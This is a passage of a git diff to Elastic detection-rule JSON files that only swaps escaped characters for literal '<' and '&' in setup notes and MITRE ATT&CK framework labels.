a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_103.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json index 9a79fd14e49..52944d4d683 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_104.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json index ca17f0e7c32..6ff17e8d96b 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_105.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json index cdcf7ae4330..3c880d2b162 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_106.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json index abfdfee2839..34d9ec7b2fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_107.json @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json index ed21f4f77bd..6e5d5118c64 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_105.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json index 5d08dc0d1a3..7c7e6f476b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_106.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json index 3e518b61030..818f8da32dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json index fe423f5414b..9f5f2f60923 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json index 731df723182..0b7376692cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json index 776fda96b0d..3d345e39b5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json index 7b110dea775..6b648508e67 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json index 764c3649cc1..42b010b519d 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json index 6cbae778429..829f4041402 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json index 19d79098cbf..36d9b92e2a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json index 3707f4750c0..d7a9e0680fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json index d6c15a6eb04..c18e120e3fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json index 10e6924bec5..a3d2dea8e20 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json index 8942c539d44..5adf0c86176 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json @@ -108,7 +108,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json index b66b7efeb75..17bb29f4b4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json index 995925f485c..9369c5e4126 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json @@ -104,7 +104,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json index de39103c3af..9b3831b1eff 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json index b67b26c01c2..dfbeb4f56aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json index 3b50be7d004..be743c2b4ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json index 3e6f9fb15da..70c864dc413 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json @@ -69,7 +69,7 @@ ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json index f8aa5ea1686..0befc83006d 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json @@ -69,7 +69,7 @@ ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json index 933c9e915db..eb6503bd2ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json @@ -69,7 +69,7 @@ ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json index fe5368fd739..b7aede240a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json @@ -69,7 +69,7 @@ ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json index 15d17562fbe..058ca537008 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json @@ -69,7 +69,7 